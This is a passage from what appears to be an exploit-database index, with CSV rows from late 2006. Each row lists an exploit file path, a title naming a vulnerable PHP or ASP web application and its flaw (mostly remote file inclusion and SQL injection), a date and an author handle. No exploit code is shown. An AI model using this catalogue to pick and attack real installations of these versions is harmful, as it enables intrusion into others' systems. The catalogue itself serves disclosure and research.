File Inclusions",2006-10-23,GregStar,php,webapps, -2623,exploits/php/webapps/2623.pl,"SourceForge 1.0.4 - 'database.php' Remote File Inclusion",2006-10-23,Kw3[R]Ln,php,webapps, -2624,exploits/php/webapps/2624.txt,"WiClear 0.10 - 'path' Remote File Inclusion",2006-10-23,"the master",php,webapps, -2626,exploits/php/webapps/2626.txt,"MDweb 1.3 - 'chemin_appli' Remote File Inclusion",2006-10-23,Drago84,php,webapps, -2627,exploits/php/webapps/2627.txt,"Jaws 0.5.2 - '/include/JawsDB.php' Remote File Inclusion",2006-10-23,Drago84,php,webapps, -2628,exploits/php/webapps/2628.pl,"JumbaCMS 0.0.1 - '/includes/functions.php' Remote File Inclusion",2006-10-23,Kw3[R]Ln,php,webapps, -2630,exploits/php/webapps/2630.txt,"InteliEditor 1.2.x - 'lib.editor.inc.php' Remote File Inclusion",2006-10-24,"Mehmet Ince",php,webapps, -2631,exploits/php/webapps/2631.php,"Ascended Guestbook 1.0.0 - 'embedded.php' File Inclusion",2006-10-24,Kacper,php,webapps, -2632,exploits/php/webapps/2632.pl,"CMS Faethon 2.0 - 'mainpath' Remote File Inclusion",2006-10-24,r0ut3r,php,webapps, -2640,exploits/php/webapps/2640.txt,"UeberProject 1.0 - '/login/secure.php' Remote File Inclusion",2006-10-24,"Mehmet Ince",php,webapps, -2642,exploits/asp/webapps/2642.asp,"Berty Forum 1.4 - 'index.php' Blind SQL Injection",2006-10-24,ajann,asp,webapps, -2643,exploits/php/webapps/2643.php,"JaxUltraBB 2.0 - Command Execution",2006-10-24,BlackHawk,php,webapps, -2644,exploits/php/webapps/2644.php,"Discuz! 5.0.0 GBK - SQL Injection / Admin Credentials Disclosure",2006-10-25,rgod,php,webapps, -2645,exploits/php/webapps/2645.txt,"ArticleBeach Script 2.0 - 'index.php' Remote File Inclusion",2006-10-25,Bithedz,php,webapps, -2646,exploits/php/webapps/2646.txt,"TextPattern 1.19 - 'publish.php' Remote File Inclusion",2006-10-25,Bithedz,php,webapps, -2647,exploits/php/webapps/2647.php,"Imageview 5 - '/Cookie/index.php' Local/Remote File Inclusion",2006-10-25,Kacper,php,webapps, -2648,exploits/php/webapps/2648.txt,"CommentIT - 'PathToComment' Remote File Inclusion",2006-10-25,"Cold Zero",php,webapps, -2652,exploits/php/webapps/2652.html,"PHP League 0.81 - 'config.php' Remote File Inclusion",2006-10-25,ajann,php,webapps, -2653,exploits/php/webapps/2653.txt,"MPCS 1.0 - 'path' Remote File Inclusion",2006-10-26,v1per-haCker,php,webapps, -2654,exploits/php/webapps/2654.txt,"ask_rave 0.9 PR - 'end.php?footfile' Remote File Inclusion",2006-10-26,v1per-haCker,php,webapps, -2655,exploits/php/webapps/2655.php,"MiniBB 2.0.2 - 'bb_func_txt.php' Remote File Inclusion",2006-10-26,Kacper,php,webapps, -2656,exploits/php/webapps/2656.txt,"MiniBill 20061010 - 'menu_builder.php' File Inclusion",2006-10-26,"Mehmet Ince",php,webapps, -2658,exploits/php/webapps/2658.php,"Light Blog Remote - Multiple Vulnerabilities",2006-10-27,BlackHawk,php,webapps, -2659,exploits/php/webapps/2659.php,"N/X WCMS 4.1 - 'nxheader.inc.php' Remote File Inclusion",2006-10-27,Kacper,php,webapps, -2660,exploits/php/webapps/2660.php,"Coppermine Photo Gallery 1.4.9 - SQL Injection",2006-10-27,w4ck1ng,php,webapps, -2661,exploits/asp/webapps/2661.asp,"PHP League 0.82 - 'classement.php' SQL Injection",2006-10-27,ajann,asp,webapps, -2662,exploits/asp/webapps/2662.txt,"Hosting Controller 6.1 Hotfix 3.2 - Unauthenticated Access",2006-10-27,"Soroush Dalili",asp,webapps, -2663,exploits/php/webapps/2663.txt,"PhpShop Core 0.9.0 RC1 - 'PS_BASE' File Inclusion",2006-10-28,"Cold Zero",php,webapps, -2664,exploits/php/webapps/2664.pl,"PHPMyDesk 1.0 Beta - 'viewticket.php' Local File Inclusion",2006-10-28,Kw3[R]Ln,php,webapps, -2665,exploits/php/webapps/2665.txt,"FreePBX 2.1.3 - 'upgrade.php' Remote File Inclusion",2006-10-28,"Mehmet Ince",php,webapps, -2666,exploits/php/webapps/2666.txt,"mp3SDS 3.0 - '/Core/core.inc.php' Remote File Inclusion",2006-10-28,"Mehmet Ince",php,webapps, -2667,exploits/php/webapps/2667.txt,"Electronic Engineering Tool (EE TOOL) 0.4.1 - Remote File Inclusion",2006-10-28,"Mehmet Ince",php,webapps, -2668,exploits/php/webapps/2668.html,"MiraksGalerie 2.62 - 'pcltar.lib.php' Remote File Inclusion",2006-10-28,ajann,php,webapps, -2669,exploits/php/webapps/2669.php,"Free Image Hosting 1.0 - 'forgot_pass.php' File Inclusion",2006-10-28,Kacper,php,webapps, -2670,exploits/php/webapps/2670.php,"Free File Hosting 1.1 - 'forgot_pass.php' File Inclusion",2006-10-28,Kacper,php,webapps, -2673,exploits/php/webapps/2673.txt,"Simple Website Software 0.99 - 'common.php' File Inclusion",2006-10-29,"Mehmet Ince",php,webapps, -2674,exploits/php/webapps/2674.php,"MySource CMS 2.16.2 - 'init_mysource.php' Remote File Inclusion",2006-10-29,Kacper,php,webapps, -2675,exploits/php/webapps/2675.asp,"PHPEasyData Pro 2.2.2 - 'index.php' SQL Injection",2006-10-29,ajann,php,webapps, -2677,exploits/php/webapps/2677.asp,"Netref 4 - 'cat_for_aff.php' Source Code Disclosure",2006-10-29,ajann,php,webapps, -2678,exploits/php/webapps/2678.txt,"Faq Administrator 2.1 - 'faq_reply.php' Remote File Inclusion",2006-10-29,v1per-haCker,php,webapps, -2679,exploits/php/webapps/2679.txt,"PHPMyRing 4.2.1 - 'cherche.php' SQL Injection",2006-10-29,ajann,php,webapps, -2681,exploits/php/webapps/2681.txt,"QnECMS 2.5.6 - 'adminfolderpath' Remote File Inclusion",2006-10-30,K-159,php,webapps, -2683,exploits/asp/webapps/2683.txt,"Techno Dreams Announcement - 'key' SQL Injection",2006-10-30,ajann,asp,webapps, -2684,exploits/asp/webapps/2684.txt,"Techno Dreams Guestbook 1.0 - 'key' SQL Injection",2006-10-30,ajann,asp,webapps, -2685,exploits/php/webapps/2685.php,"Nitrotech 0.0.3a - Remote Code Execution",2006-10-30,Kacper,php,webapps, -2686,exploits/php/webapps/2686.php,"phpBB Spider Friendly Module 1.3.10 - Remote File Inclusion",2006-10-30,Kacper,php,webapps, -2687,exploits/php/webapps/2687.html,"E Annu 1.0 - Authentication Bypass / SQL Injection",2006-10-30,ajann,php,webapps, -2688,exploits/php/webapps/2688.txt,"phpProfiles 2.1 Beta - Multiple Remote File Inclusions",2006-10-30,v1per-haCker,php,webapps, -2691,exploits/php/webapps/2691.txt,"P-Book 1.17 - 'pb_lang' Remote File Inclusion",2006-10-31,Matdhule,php,webapps, -2692,exploits/php/webapps/2692.txt,"GEPI 1.4.0 - '/gestion/savebackup.php' Remote File Inclusion",2006-10-31,"Sumit Siddharth",php,webapps, -2693,exploits/php/webapps/2693.txt,"PwsPHP 1.1 - '/themes/fin.php' Remote File Inclusion",2006-10-31,3l3ctric-Cracker,php,webapps, -2694,exploits/php/webapps/2694.php,"T.G.S. CMS 0.1.7 - 'logout.php' SQL Injection",2006-10-31,Kacper,php,webapps, -2696,exploits/php/webapps/2696.php,"Invision Power Board 2.1.7 - 'Debug' Remote Password Change",2006-11-01,Rapigator,php,webapps, -2697,exploits/php/webapps/2697.php,"Innovate Portal 2.0 - 'acp.php' Remote Code Execution",2006-11-01,Kacper,php,webapps, -2698,exploits/php/webapps/2698.pl,"2BGal 3.0 - '/admin/configuration.inc.php' Local File Inclusion",2006-11-01,Kw3[R]Ln,php,webapps, -2701,exploits/php/webapps/2701.txt,"TikiWiki 1.9.5 Sirius - 'sort_mode' Information Disclosure",2006-11-01,securfrog,php,webapps, -2702,exploits/php/webapps/2702.php,"Lithium CMS 4.04c - '/classes/index.php' Local File Inclusion",2006-11-02,Kacper,php,webapps, -2703,exploits/php/webapps/2703.txt,"Article System 0.6 - 'volume.php' Remote File Inclusion",2006-11-02,GregStar,php,webapps, -2704,exploits/php/webapps/2704.txt,"FreeWebShop.org script 2.2.2 - Multiple Vulnerabilities",2006-11-02,Spiked,php,webapps, -2706,exploits/php/webapps/2706.txt,"MODx CMS 0.9.2.1 - 'FCKeditor' Remote File Inclusion",2006-11-03,nuffsaid,php,webapps, -2707,exploits/php/webapps/2707.php,"PostNuke 0.763 - 'PNSV lang' Remote Code Execution",2006-11-03,Kacper,php,webapps, -2709,exploits/php/webapps/2709.txt,"Creasito E-Commerce Content Manager - 'admin' Authentication Bypass",2006-11-03,SlimTim10,php,webapps, -2710,exploits/php/webapps/2710.txt,"Ariadne 2.4 - store_config[code] Remote File Inclusion",2006-11-04,"Mehmet Ince",php,webapps, -2711,exploits/php/webapps/2711.php,"e107 < 0.75 - 'e107language_e107cookie' Local File Inclusion",2006-11-04,Kacper,php,webapps, -2712,exploits/php/webapps/2712.php,"MDPro 1.0.76 - 'Cookie PNSVlang' Local File Inclusion",2006-11-04,Kacper,php,webapps, -2713,exploits/php/webapps/2713.txt,"Drake CMS < 0.2.3 ALPHA rev.916 - Remote File Inclusion",2006-11-04,GregStar,php,webapps, -2714,exploits/php/webapps/2714.pl,"PHPKIT 1.6.1R2 - 'search_user' SQL Injection",2006-11-04,x23,php,webapps, -2717,exploits/php/webapps/2717.txt,"phpDynaSite 3.2.2 - 'racine' Remote File Inclusion",2006-11-04,DeltahackingTEAM,php,webapps, -2718,exploits/php/webapps/2718.txt,"SazCart 1.5 - 'cart.php' Remote File Inclusion",2006-11-04,IbnuSina,php,webapps, -2719,exploits/php/webapps/2719.php,"Quick.CMS.Lite 0.3 - Cookie sLanguage Local File Inclusion",2006-11-05,Kacper,php,webapps, -2720,exploits/php/webapps/2720.pl,"PHP Classifieds 7.1 - 'detail.php' SQL Injection",2006-11-05,ajann,php,webapps, -2721,exploits/php/webapps/2721.php,"Ultimate PHP Board 2.0 - 'header_simple.php' File Inclusion",2006-11-05,Kacper,php,webapps, -2722,exploits/php/webapps/2722.pl,"Webdrivers Simple Forum - 'message_details.php' SQL Injection",2006-11-05,Bl0od3r,php,webapps, -2724,exploits/php/webapps/2724.txt,"Soholaunch Pro 4.9 r36 - Remote File Inclusion",2006-11-06,the_day,php,webapps, -2725,exploits/php/webapps/2725.txt,"Cyberfolio 2.0 RC1 - 'av' Remote File Inclusion",2006-11-06,the_day,php,webapps, -2726,exploits/php/webapps/2726.txt,"Agora 1.4 RC1 - 'MysqlfinderAdmin.php' Remote File Inclusion",2006-11-06,the_day,php,webapps, -2727,exploits/php/webapps/2727.txt,"OpenEMR 2.8.1 - 'srcdir' Multiple Remote File Inclusions",2006-11-06,the_day,php,webapps, -2728,exploits/php/webapps/2728.txt,"Article Script 1.6.3 - 'rss.php' SQL Injection",2006-11-06,Liz0ziM,php,webapps, -2731,exploits/php/webapps/2731.pl,"iPrimal Forums - '/admin/index.php' Change User Password",2006-11-06,Bl0od3r,php,webapps, -2732,exploits/php/webapps/2732.txt,"PHPGiggle 12.08 - 'CFG_PHPGIGGLE_ROOT' File Inclusion",2006-11-06,ajann,php,webapps, -2733,exploits/php/webapps/2733.txt,"iWare Pro 5.0.4 - 'chat_panel.php' Remote Code Execution",2006-11-07,nuffsaid,php,webapps, -2736,exploits/php/webapps/2736.txt,"PHPAdventure 1.1 - 'ad_main.php' Remote File Inclusion",2006-11-07,HER0,php,webapps, -2739,exploits/php/webapps/2739.txt,"iPrimal Forums - '/admin/index.php' Remote File Inclusion",2006-11-08,Bl0od3r,php,webapps, -2740,exploits/php/webapps/2740.txt,"vBlog / C12 0.1 - 'cfgProgDir' Remote File Inclusion",2006-11-08,DeltahackingTEAM,php,webapps, -2741,exploits/php/webapps/2741.txt,"IrayoBlog 0.2.4 - '/inc/irayofuncs.php' Remote File Inclusion",2006-11-08,DeltahackingTEAM,php,webapps, -2742,exploits/php/webapps/2742.txt,"DodosMail 2.0.1 - 'dodosmail.php' Remote File Inclusion",2006-11-08,"Cold Zero",php,webapps, -2744,exploits/php/webapps/2744.txt,"LetterIt 2.0 - 'session.php' Remote File Inclusion",2006-11-09,v1per-haCker,php,webapps, -2745,exploits/php/webapps/2745.txt,"gtcatalog 0.9.1 - 'index.php' Remote File Inclusion",2006-11-09,v1per-haCker,php,webapps, -2746,exploits/asp/webapps/2746.pl,"AspPired2Poll 1.0 - 'MoreInfo.asp' SQL Injection",2006-11-09,ajann,asp,webapps, -2747,exploits/php/webapps/2747.txt,"MyAlbum 3.02 - 'language.inc.php' Remote File Inclusion",2006-11-09,"Silahsiz Kuvvetler",php,webapps, -2748,exploits/php/webapps/2748.pl,"PHPManta 1.0.2 - 'view-sourcecode.php' Local File Inclusion",2006-11-09,ajann,php,webapps, -2750,exploits/php/webapps/2750.txt,"EncapsCMS 0.3.6 - '/core/core.php' Remote File Inclusion",2006-11-10,Firewall,php,webapps, -2751,exploits/php/webapps/2751.txt,"BrewBlogger 1.3.1 - 'printLog.php' SQL Injection",2006-11-10,"Craig Heffner",php,webapps, -2752,exploits/php/webapps/2752.txt,"WORK System E-Commerce 3.0.1 - Remote File Inclusion",2006-11-10,SlimTim10,php,webapps, -2754,exploits/asp/webapps/2754.pl,"NuCommunity 1.0 - 'cl_CatListing.asp' SQL Injection",2006-11-11,ajann,asp,webapps, -2755,exploits/asp/webapps/2755.pl,"NuRems 1.0 - 'propertysdetails.asp' SQL Injection",2006-11-11,ajann,asp,webapps, -2756,exploits/asp/webapps/2756.txt,"NuStore 1.0 - 'Products.asp' SQL Injection",2006-11-11,ajann,asp,webapps, -2757,exploits/asp/webapps/2757.pl,"NuSchool 1.0 - 'CampusNewsDetails.asp' SQL Injection",2006-11-11,ajann,asp,webapps, -2758,exploits/php/webapps/2758.php,"PHPWCMS 1.2.6 - Cookie: wcs_user_lang Local File Inclusion",2006-11-11,Kacper,php,webapps, -2759,exploits/php/webapps/2759.php,"PHPWind 5.0.1 - 'AdminUser' Blind SQL Injection",2006-11-12,rgod,php,webapps, -2760,exploits/php/webapps/2760.php,"Rama CMS 0.68 - Cookie: lang Local File Inclusion",2006-11-12,Kacper,php,webapps, -2761,exploits/asp/webapps/2761.pl,"Munch Pro 1.0 - 'switch.asp' SQL Injection",2006-11-12,ajann,asp,webapps, -2762,exploits/asp/webapps/2762.asp,"ASPPortal 4.0.0 - 'default1.asp' SQL Injection",2006-11-12,ajann,asp,webapps, -2763,exploits/asp/webapps/2763.txt,"UStore 1.0 - 'detail.asp' SQL Injection",2006-11-12,ajann,asp,webapps, -2764,exploits/asp/webapps/2764.txt,"USupport 1.0 - 'detail.asp' SQL Injection",2006-11-12,ajann,asp,webapps, -2765,exploits/asp/webapps/2765.txt,"UPublisher 1.0 - 'viewarticle.asp' SQL Injection",2006-11-12,ajann,asp,webapps, -2766,exploits/php/webapps/2766.pl,"CMSmelborp Beta - 'user_standard.php' Remote File Inclusion",2006-11-12,DeltahackingTEAM,php,webapps, -2767,exploits/php/webapps/2767.txt,"StoryStream 4.0 - 'baseDir' Remote File Inclusion",2006-11-12,v1per-haCker,php,webapps, -2768,exploits/php/webapps/2768.txt,"ContentNow 1.30 - Local File Inclusion / Arbitrary File Upload/Delete",2006-11-13,r0ut3r,php,webapps, -2769,exploits/php/webapps/2769.php,"Quick.Cart 2.0 - '/actions_client/gallery.php' Local File Inclusion",2006-11-13,Kacper,php,webapps, -2772,exploits/asp/webapps/2772.html,"Online Event Registration 2.0 - 'save_profile.asp' Pass Change",2006-11-13,ajann,asp,webapps, -2773,exploits/asp/webapps/2773.txt,"Estate Agent Manager 1.3 - 'default.asp' Authentication Bypass",2006-11-13,ajann,asp,webapps, -2774,exploits/asp/webapps/2774.txt,"Property Pro 1.0 - 'vir_Login.asp' Remote Authentication Bypass",2006-11-13,ajann,asp,webapps, -2775,exploits/php/webapps/2775.txt,"Phpjobscheduler 3.0 - 'installed_config_file' File Inclusion",2006-11-13,Firewall,php,webapps, -2776,exploits/php/webapps/2776.txt,"ContentNow 1.30 - Arbitrary File Upload / Cross-Site Scripting",2006-11-14,Timq,php,webapps, -2777,exploits/php/webapps/2777.txt,"Aigaion 1.2.1 - 'DIR' Remote File Inclusion",2006-11-14,navairum,php,webapps, -2778,exploits/php/webapps/2778.txt,"PHPPeanuts 1.3 Beta - 'Inspect.php' Remote File Inclusion",2006-11-14,"Hidayat Sagita",php,webapps, -2779,exploits/asp/webapps/2779.txt,"ASP Smiley 1.0 - 'default.asp' Authentication Bypass / SQL Injection",2006-11-14,ajann,asp,webapps, -2780,exploits/asp/webapps/2780.txt,"NetVIOS 2.0 - 'page.asp' SQL Injection",2006-11-14,ajann,asp,webapps, -2781,exploits/asp/webapps/2781.txt,"blogme 3.0 - Cross-Site Scripting / Authentication Bypass",2006-11-14,"Security Access Point",asp,webapps, -2782,exploits/asp/webapps/2782.txt,"Hpecs Shopping Cart - Remote Authentication Bypass",2006-11-14,"Security Access Point",asp,webapps, -2786,exploits/php/webapps/2786.txt,"torrentflux 2.2 - Arbitrary File Create/ Execute/Delete",2006-11-15,r0ut3r,php,webapps, -2790,exploits/php/webapps/2790.pl,"Etomite CMS 0.6.1.2 - '/manager/index.php' Local File Inclusion",2006-11-16,Revenge,php,webapps, -2791,exploits/php/webapps/2791.txt,"HTTP Upload Tool - 'download.php' Information Disclosure",2006-11-16,"Craig Heffner",php,webapps, -2794,exploits/php/webapps/2794.txt,"mg.applanix 1.3.1 - 'apx_root_path' Remote File Inclusion",2006-11-17,v1per-haCker,php,webapps, -2795,exploits/php/webapps/2795.txt,"DoSePa 1.0.4 - 'textview.php' Information Disclosure",2006-11-17,"Craig Heffner",php,webapps, -2796,exploits/php/webapps/2796.php,"miniCWB 1.0.0 - 'contact.php' Local File Inclusion",2006-11-17,Kacper,php,webapps, -2797,exploits/php/webapps/2797.txt,"Powies pForum 1.29a - 'editpoll.php' SQL Injection",2006-11-17,SHiKaA,php,webapps, -2798,exploits/php/webapps/2798.txt,"Powies MatchMaker 4.05 - 'matchdetail.php' SQL Injection",2006-11-17,SHiKaA,php,webapps, -2799,exploits/php/webapps/2799.txt,"mxBB Module calsnails 1.06 - 'mx_common.php' File Inclusion",2006-11-17,bd0rk,php,webapps, -2807,exploits/php/webapps/2807.pl,"Joomla! Component MosReporter 0.9.3 - Remote File Inclusion",2006-11-17,Crackers_Child,php,webapps, -2808,exploits/php/webapps/2808.txt,"Dicshunary 0.1a - 'check_status.php' Remote File Inclusion",2006-11-17,DeltahackingTEAM,php,webapps, -2810,exploits/php/webapps/2810.php,"Oxygen 1.1.3 (O2PHP Bulletin Board) - SQL Injection",2006-11-18,DarkFig,php,webapps, -2811,exploits/php/webapps/2811.txt,"PHPWebThings 1.5.2 - 'editor.php' Remote File Inclusion",2006-11-18,nuffsaid,php,webapps, -2812,exploits/php/webapps/2812.pl,"PHP Easy Downloader 1.5 - 'save.php' Remote Code Execution",2006-11-18,nuffsaid,php,webapps, -2813,exploits/asp/webapps/2813.txt,"ASPNuke 0.80 - 'register.asp' SQL Injection",2006-11-19,ajann,asp,webapps, -2814,exploits/php/webapps/2814.txt,"PHPQuickGallery 1.9 - 'textFile' Remote File Inclusion",2006-11-19,"Al7ejaz Hacker",php,webapps, -2817,exploits/php/webapps/2817.txt,"Photo Cart 3.9 - 'adminprint.php' Remote File Inclusion",2006-11-21,irvian,php,webapps, -2818,exploits/php/webapps/2818.txt,"e-Ark 1.0 - '/src/ark_inc.php' Remote File Inclusion",2006-11-21,DeltahackingTEAM,php,webapps, -2819,exploits/php/webapps/2819.txt,"LDU 8.x - avatarselect id SQL Injection",2006-11-21,nukedx,php,webapps, -2820,exploits/php/webapps/2820.txt,"Seditio 1.10 - avatarselect id SQL Injection",2006-11-21,nukedx,php,webapps, -2822,exploits/php/webapps/2822.pl,"ContentNow 1.39 - 'pageid' SQL Injection",2006-11-21,Revenge,php,webapps, -2823,exploits/php/webapps/2823.txt,"aBitWhizzy - 'abitwhizzy.php' Information Disclosure",2006-11-21,"Security Access Point",php,webapps, -2826,exploits/php/webapps/2826.txt,"Pearl Forums 2.4 - Multiple Remote File Inclusions",2006-11-21,3l3ctric-Cracker,php,webapps, -2827,exploits/php/webapps/2827.txt,"phpPC 1.04 - Multiple Remote File Inclusions",2006-11-21,iss4m,php,webapps, -2828,exploits/asp/webapps/2828.pl,"FipsCMS 4.5 - 'index.asp' SQL Injection",2006-11-22,ajann,asp,webapps, -2829,exploits/asp/webapps/2829.txt,"fipsGallery 1.5 - 'index1.asp' SQL Injection",2006-11-22,ajann,asp,webapps, -2830,exploits/asp/webapps/2830.txt,"fipsForum 2.6 - 'default2.asp' SQL Injection",2006-11-22,ajann,asp,webapps, -2831,exploits/php/webapps/2831.txt,"a-ConMan 3.2b - 'common.inc.php' Remote File Inclusion",2006-11-22,Matdhule,php,webapps, -2832,exploits/php/webapps/2832.txt,"Messagerie Locale - 'centre.php' Remote File Inclusion",2006-11-23,DaDIsS,php,webapps, -2833,exploits/php/webapps/2833.txt,"Site News - 'centre.php' Remote File Inclusion",2006-11-23,DaDIsS,php,webapps, -2834,exploits/php/webapps/2834.txt,"Recipes Complete Website 1.1.14 - SQL Injection",2006-11-23,GregStar,php,webapps, -2835,exploits/php/webapps/2835.txt,"Wallpaper Complete Website 1.0.09 - SQL Injection",2006-11-23,GregStar,php,webapps, -2836,exploits/php/webapps/2836.txt,"JiRos FAQ Manager 1.0 - 'index.asp' SQL Injection",2006-11-23,ajann,php,webapps, -2838,exploits/php/webapps/2838.txt,"HSRS 1.0 - 'addcode.php' Remote File Inclusion",2006-11-23,"Cold Zero",php,webapps, -2839,exploits/php/webapps/2839.txt,"OWLLib 1.0 - 'OWLMemoryProperty.php' Remote File Inclusion",2006-11-23,DeltahackingTEAM,php,webapps, -2840,exploits/php/webapps/2840.txt,"PEGames - 'index.php' Remote File Inclusion",2006-11-23,DeltahackingTEAM,php,webapps, -2841,exploits/php/webapps/2841.php,"Woltlab Burning Board Lite 1.0.2 - 'decode_cookie()' SQL Injection",2006-11-24,rgod,php,webapps, -2842,exploits/php/webapps/2842.php,"Woltlab Burning Board Lite 1.0.2 - Blind SQL Injection",2006-11-23,rgod,php,webapps, -2843,exploits/php/webapps/2843.pl,"PHP-Nuke NukeAI Module 3b - 'util.php' Remote File Inclusion",2006-11-24,DeltahackingTEAM,php,webapps, -2844,exploits/php/webapps/2844.pl,"Cahier de texte 2.0 - Database Backup / Source Disclosure",2006-11-24,DarkFig,php,webapps, -2846,exploits/asp/webapps/2846.txt,"Liberum Help Desk 0.97.3 - SQL Injection",2006-11-25,ajann,asp,webapps, -2847,exploits/php/webapps/2847.txt,"Sisfo Kampus 0.8 - Remote File Inclusion / Download",2006-11-25,"Wawan Firmansyah",php,webapps, -2848,exploits/asp/webapps/2848.txt,"Basic Forum 1.1 - 'edit.asp' SQL Injection",2006-11-25,bolivar,asp,webapps, -2849,exploits/asp/webapps/2849.txt,"ASP-Nuke Community 1.5 - Cookie Privilege Escalation",2006-11-25,ajann,asp,webapps, -2850,exploits/php/webapps/2850.txt,"Exhibit Engine 1.22 - 'styles.php' Remote File Inclusion",2006-11-25,Kacper,php,webapps, -2851,exploits/php/webapps/2851.txt,"Hacks List phpBB Mod 1.21 - SQL Injection",2006-11-26,"the master",php,webapps, -2852,exploits/php/webapps/2852.txt,"Mambo Component com_flyspray < 1.0.1 - Remote File Disclosure",2006-11-26,3l3ctric-Cracker,php,webapps, -2853,exploits/asp/webapps/2853.txt,"SimpleBlog 2.3 - '/admin/edit.asp' SQL Injection",2006-11-26,bolivar,asp,webapps, -2859,exploits/php/webapps/2859.php,"Discuz! 4.x - SQL Injection / Admin Credentials Disclosure",2006-11-28,rgod,php,webapps, -2862,exploits/php/webapps/2862.txt,"P-News 2.0 - 'user.txt' Remote Password Disclosure",2006-11-28,Lu7k,php,webapps, -2863,exploits/php/webapps/2863.php,"kubix 0.7 - Multiple Vulnerabilities",2006-11-29,BlackHawk,php,webapps, -2864,exploits/php/webapps/2864.txt,"b2evolution 1.8.5 < 1.9b - 'import-mt.php' Remote File Inclusion",2006-11-29,tarkus,php,webapps, -2867,exploits/php/webapps/2867.php,"phpGraphy 0.9.12 - Privilege Escalation / Commands Execution",2006-11-30,rgod,php,webapps, -2869,exploits/php/webapps/2869.php,"S9Y Serendipity 1.0.3 - 'comment.php' Local File Inclusion",2006-11-30,Kacper,php,webapps, -2871,exploits/php/webapps/2871.txt,"LDU 8.x - 'polls.php' SQL Injection",2006-11-30,ajann,php,webapps, -2876,exploits/php/webapps/2876.txt,"DZCP (deV!L_z Clanportal) 1.3.6 - Arbitrary File Upload",2006-12-01,"Tim Weber",php,webapps, -2877,exploits/php/webapps/2877.txt,"Invision Community Blog Mod 1.2.4 - SQL Injection",2006-12-01,anonymous,php,webapps, -2878,exploits/php/webapps/2878.txt,"ContentServ 4.x - '/admin/FileServer.php' File Disclosure",2006-12-01,qobaiashi,php,webapps, -2881,exploits/asp/webapps/2881.txt,"Ultimate HelpDesk - Cross-Site Scripting / Local File Disclosure",2006-12-01,ajann,asp,webapps, -2882,exploits/php/webapps/2882.txt,"BBS E-Market Professional - Full Path Disclosure / File Inclusion",2006-12-02,y3dips,php,webapps, -2883,exploits/php/webapps/2883.txt,"simple file manager 0.24a - Multiple Vulnerabilities",2006-12-02,flame,php,webapps, -2884,exploits/php/webapps/2884.txt,"awrate.com Message Board 1.0 - 'search.php' Remote File Inclusion",2006-12-02,DeltahackingTEAM,php,webapps, -2885,exploits/php/webapps/2885.txt,"mxBB Module mx_tinies 1.3.0 - Remote File Inclusion",2006-12-02,bd0rk,php,webapps, -2886,exploits/php/webapps/2886.txt,"PHP Upload Center 2.0 - 'activate.php' File Inclusion",2006-12-03,GregStar,php,webapps, -2888,exploits/php/webapps/2888.php,"Envolution 1.1.0 - 'PNSVlang' Remote Code Execution",2006-12-03,Kacper,php,webapps, -2889,exploits/php/webapps/2889.pl,"QuickCart 2.0 - 'categories.php' Local File Inclusion",2006-12-03,r0ut3r,php,webapps, -2890,exploits/php/webapps/2890.txt,"PHP-revista 1.1.2 - 'adodb' Multiple Remote File Inclusions",2006-12-03,"Cold Zero",php,webapps, -2891,exploits/php/webapps/2891.txt,"CuteNews aj-fork 167f - 'cutepath' Remote File Inclusion",2006-12-04,DeltahackingTEAM,php,webapps, -2894,exploits/php/webapps/2894.txt,"Phorum 3.2.11 - 'common.php' Remote File Inclusion",2006-12-06,Mr-m07,php,webapps, -2895,exploits/php/webapps/2895.pl,"J-OWAMP Web Interface 2.1b - 'link' Remote File Inclusion",2006-12-07,3l3ctric-Cracker,php,webapps, -2896,exploits/php/webapps/2896.txt,"Tucows Client Code Suite (CSS) 1.2.1015 - Remote File Inclusion",2006-12-08,3l3ctric-Cracker,php,webapps, -2897,exploits/php/webapps/2897.txt,"CM68 News 12.02.06 - 'addpth' Remote File Inclusion",2006-12-08,"Paul Bakoyiannis",php,webapps, -2898,exploits/php/webapps/2898.txt,"ThinkEdit 1.9.2 - 'render.php' Remote File Inclusion",2006-12-08,r0ut3r,php,webapps, -2899,exploits/php/webapps/2899.txt,"paFileDB 3.5.2/3.5.3 - Remote Authentication Bypass / SQL Injection",2006-12-08,koray,php,webapps, -2902,exploits/php/webapps/2902.pl,"TorrentFlux 2.2 - 'downloaddetails.php' Local File Disclosure",2006-12-09,r0ut3r,php,webapps, -2903,exploits/php/webapps/2903.pl,"TorrentFlux 2.2 - 'maketorrent.php' Remote Command Execution",2006-12-09,r0ut3r,php,webapps, -2904,exploits/php/webapps/2904.txt,"mxBB Module Profile CP 0.91c - Remote File Inclusion",2006-12-09,bd0rk,php,webapps, -2905,exploits/php/webapps/2905.txt,"Gizzar 03162002 - 'index.php' Remote File Inclusion",2006-12-09,DeltahackingTEAM,php,webapps, -2906,exploits/php/webapps/2906.pl,"Fantastic News 2.1.4 - 'news.php' SQL Injection",2006-12-09,Bl0od3r,php,webapps, -2907,exploits/asp/webapps/2907.txt,"SpotLight CRM 1.0 - 'login.asp' SQL Injection",2006-12-09,ajann,asp,webapps, -2908,exploits/asp/webapps/2908.txt,"Request For Travel 1.0 - 'product' SQL Injection",2006-12-09,ajann,asp,webapps, -2909,exploits/asp/webapps/2909.txt,"HR Assist 1.05 - 'vdateUsr.asp' Remote Authentication Bypass",2006-12-09,ajann,asp,webapps, -2913,exploits/php/webapps/2913.php,"PHPAlbum 0.4.1 Beta 6 - 'language.php' Local File Inclusion",2006-12-10,Kacper,php,webapps, -2917,exploits/php/webapps/2917.txt,"mxBB Module ErrorDocs 1.0 - 'common.php' Remote File Inclusion",2006-12-11,bd0rk,php,webapps, -2919,exploits/php/webapps/2919.pl,"mxBB Module Activity Games 0.92 - Remote File Inclusion",2006-12-11,3l3ctric-Cracker,php,webapps, -2920,exploits/php/webapps/2920.txt,"Barman 0.0.1r3 - 'Interface.php' Remote File Inclusion",2006-12-11,DeltahackingTEAM,php,webapps, -2921,exploits/php/webapps/2921.txt,"mxBB Module mx_modsdb 1.0 - Remote File Inclusion",2006-12-12,Lu7k,php,webapps, -2923,exploits/php/webapps/2923.txt,"Blog:CMS 4.1.3 - 'NP_UserSharing.php' Remote File Inclusion",2006-12-12,"HACKERS PAL",php,webapps, -2924,exploits/php/webapps/2924.txt,"mxBB Module kb_mods 2.0.2 - Remote File Inclusion",2006-12-12,3l3ctric-Cracker,php,webapps, -2925,exploits/php/webapps/2925.pl,"mxBB Module newssuite 1.03 - Remote File Inclusion",2006-12-12,3l3ctric-Cracker,php,webapps, -2927,exploits/php/webapps/2927.txt,"PHPMyCMS 0.3 - 'basic.inc.php' Remote File Inclusion",2006-12-13,v1per-haCker,php,webapps, -2930,exploits/php/webapps/2930.pl,"yaplap 0.6.1b - 